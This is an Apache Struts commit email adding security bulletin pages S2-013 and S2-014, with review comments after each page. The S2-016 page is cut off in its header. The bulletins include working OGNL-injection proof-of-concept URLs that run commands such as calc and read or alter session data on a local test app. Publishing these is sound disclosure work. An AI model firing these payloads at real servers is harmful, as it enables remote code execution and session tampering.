From lukaszlen...@apache.org
Subject svn commit: r869821 [30/43] - in /websites/production/struts/content/development/2.x/docs: ./ ajax-validation.data/ big-picture.data/ chaining-interceptor.data/ colophon.data/ config-browser-plugin.data/ create-struts-2-web-application-using-maven-to-m...
Date Wed, 17 Jul 2013 09:31:13 GMT
Added: websites/production/struts/content/development/2.x/docs/s2-013.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-013.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-013.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,207 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-013</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-013.html">S2-013</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-013</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-013-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability, present in the <em>includeParams</em> attribute of the <em>URL</em> and <em>Anchor</em> Tag, allows remote command execution</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote command execution</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">High Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23141">Struts 2.3.14.1</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software</th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14 </td></tr><tr><th colspan="1" rowspan="1" 
 class="confluenceTh">Reporter</th><td colspan="1" rowspan="1" class="confluenceTd"> The Struts Team </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">CVE Identifier</th><td colspan="1" rowspan="1" class="confluenceTd"><a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966" rel="nofollow">CVE-2013-1966</a></td></tr></tbody></table>
+</div>
+
+<h2><a shape="rect" name="S2-013-Problem"></a>Problem</h2>
+
+<p>Both the <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html"><em>s:url</em></a> and <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.1.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html"><em>s:a</em></a> tag provide an <em>includeParams</em> attribute. </p>
+
+<p>The main scope of that attribute is to understand whether includes http request parameter or not.  </p>
+
+<p>The allowed values of includeParams are:</p>
+<ol><li><em>none</em> - include no parameters in the URL (default)</li><li><em>get</em> - include only GET parameters in the URL</li><li><em>all</em> - include both GET and POST parameters in the URL</li></ol>
+
+
+<p>A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an <em>URL</em> or <em>A</em> tag , which will cause a further evaluation. </p>
+
+<p>The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.<br clear="none">
+This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</p>
+
+<h2><a shape="rect" name="S2-013-Proofofconcept"></a>Proof of concept</h2>
+
+<ol><li>Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+ includeParams="all"
+]]></script>
+</div></div>
+<p>Such that the line will be something look like this:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;s:url id="url" action="HelloWorld" includeParams="all"&gt;
+]]></script>
+</div></div>
+<p>(it works also with <em>includeParams="get"</em>).</p></li><li>Run struts2-blank app</li><li>Open the url: <a shape="rect" class="external-link" href="http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D" rel="nofollow">http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D</a><br clear="none">
+ (this is the shortened version <a shape="rect" class="external-link" href="http://goo.gl/lhlTl" rel="nofollow">http://goo.gl/lhlTl</a>)</li></ol>
+
+
+<p>As you will notice, in this case, there is no way to escape/sanitize the fakeParam, since it's not an expected parameter. </p>
+
+<h2><a shape="rect" name="S2-013-Solution"></a>Solution</h2>
+
+<p>The OGNLUtil class was changed to deny eval expressions by default. </p>
+
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>Backward Compatibility</b><br clear="none">In case you need to restore the old behavior, you need to define the following constant, inside your struts configuration (<b>use it at your own risk</b>).
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;constant name="struts.ognl.enableOGNLEvalExpression" value="true" /&gt;
+]]></script>
+</div></div>
+<p>Please, ensure that:</p>
+<ol><li>there are no <em>includeParams</em> with "all" or "get" value</li><li>every parameter which is declared inside the <em>u</em> or <em>a</em> tag come from a sanitized input.</li></ol>
+</td></tr></table></div>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23141">Struts 2.3.14.1</a>, which contains the corrected OGNL and XWork library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file
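Review bot: The Backward Compatibility box (the `struts.ognl.enableOGNLEvalExpression` constant and the two-item checklist under it) tells readers the pre-fix behaviour can be restored safely as long as no tag uses `includeParams="all"`/`"get"` and tag params are sanitised, but the S2-014 page added in this same commit states that the 2.3.14.1 fix did not close all vectors, so that guidance is stale on the day it is published. I would add one sentence directly under the constant: `Note: the 2.3.14.1 fix was later found to be incomplete (see S2-014); do not rely on this constant or on the checklist below as a mitigation on any version before 2.3.14.2.` Separately, the page loads `shCore.js`, `shBrushJava.js` and `shBrushXml.js` over plain `http://` while `default.css` is fetched over `https://`, so a bulletin viewed over TLS executes active content pulled over an unauthenticated channel; the three `src` values should be `https://`. Minor wording: the rating reads "High Critical" here but "Highly Critical" in S2-014, and the checklist item "inside the u or a tag" should read "url or a tag".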

Added: websites/production/struts/content/development/2.x/docs/s2-014.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-014.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-014.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,214 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-014</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-014.html">S2-014</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-014</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822584">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822584">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822584">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822584">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822584">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822584">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-014-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability introduced by forcing parameter inclusion in the <em>URL</em> and <em>Anchor</em> Tag allows remote command execution, session access and manipulation and XSS attacks</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers and users</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote command execution, remote server context manipulation, injection of malicious client side code</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">Highly Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23142">Struts 2.3.14.2</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software</th><td colspan="1" rowspan="1" clas
 s="confluenceTd"> Struts 2.0.0 - Struts 2.3.14.1 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Reporter</th><td colspan="1" rowspan="1" class="confluenceTd"> Eric Kobrin and Douglas Rodrigues (Akamai), Coverity Security Research Laboratory, NSFOCUS Security Team </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">CVE Identifier</th><td colspan="1" rowspan="1" class="confluenceTd"><a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115" rel="nofollow">CVE-2013-2115</a>, <a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966" rel="nofollow">CVE-2013-1966</a></td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-014-Problem"></a>Problem</h2>
+
+<p>Both the <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html"><em>s:url</em></a> and <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html"><em>s:a</em></a> tag provide an <em>includeParams</em> attribute. </p>
+
+<p>The main scope of that attribute is to understand whether includes http request parameter or not.  </p>
+
+<p>The allowed values of includeParams are:</p>
+<ol><li><em>none</em> - include no parameters in the URL (default)</li><li><em>get</em> - include only GET parameters in the URL</li><li><em>all</em> - include both GET and POST parameters in the URL</li></ol>
+
+
+<p>A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an <em>URL</em> or <em>A</em> tag , which will cause a further evaluation. </p>
+
+<p>The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.<br clear="none">
+This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</p>
+
+<p>The issue was originally addressed by Struts 2.3.14.1 and Security Announcement <a shape="rect" href="s2-013.html" title="S2-013">S2-013</a>. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that <b>every</b> version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.</p>
+
+<h2><a shape="rect" name="S2-014-Proofofconcept"></a>Proof of concept</h2>
+
+<ol><li>Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+ includeParams="all"
+]]></script>
+</div></div>
+<p>Such that the line will be something look like this:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;s:url id="url" action="HelloWorld" includeParams="all"&gt;
+]]></script>
+</div></div></li><li>Run struts2-blank app</li><li>Open the following url, resulting in calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):
+  <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}]]></script>
+</div></div></li><li>Open the following url to modify session content:
+  <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}]]></script>
+</div></div></li><li>Open the following url to print out session content and in combination with the previous example introduce arbitrary code into the resulting HTML output:
+  <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}]]></script>
+</div></div></li></ol>
+
+
+<p>As you will notice, in this case, there is no way to escape/sanitize the malicious parameter, since it's not an expected parameter and even will not get evaluated the request parameters are processed. </p>
+
+<h2><a shape="rect" name="S2-014-Solution"></a>Solution</h2>
+
+<p>The URL rendering subsystem was changed to not pass any parameter name or value to OGNL evaluation.</p>
+
+<p>The MemberAccess component's allowStaticMethodAccess property is now immutable.</p>
+
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>Backward Compatibility</b><br clear="none">A small amount of very elaborated <em>URL</em> or <em>A</em> tag usages depending on the now disabled evaluation might produce unexpected results now.<br clear="none">
+Please, ensure that
+<ol><li>all expressions that should get evaluated are explicitly introduced via <em>PARAM</em> tags within <em>URL</em> or <em>A</em> tags.</li><li>all expressions used in <em>PARAM</em> tags come from a sanitized input.</li></ol>
+</td></tr></table></div>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23142">Struts 2.3.14.2</a>, which contains the corrected OGNL and XWork library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file
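Review bot: The page loads `shCore.js`, `shBrushJava.js` and `shBrushXml.js` over plain `http://` while `default.css` comes from `https://`, so a security bulletin read over TLS executes script fetched over an unauthenticated channel; the three `src` attributes should use `https://`. The sentence after the PoC list, "since it's not an expected parameter and even will not get evaluated the request parameters are processed", is missing a clause — presumably it means the payload is evaluated when the URL tag renders even though the parameter is never bound to the action, but that should be confirmed with the author and reworded. The Solution section says `allowStaticMethodAccess` is now immutable but does not say whether the `struts.ognl.enableOGNLEvalExpression` opt-out documented in S2-013 still has any effect after this change; one sentence either way would save readers reconciling the two bulletins.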

Added: websites/production/struts/content/development/2.x/docs/s2-016.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-016.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-016.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,192 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-016</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-016.html">S2-016</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-016</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
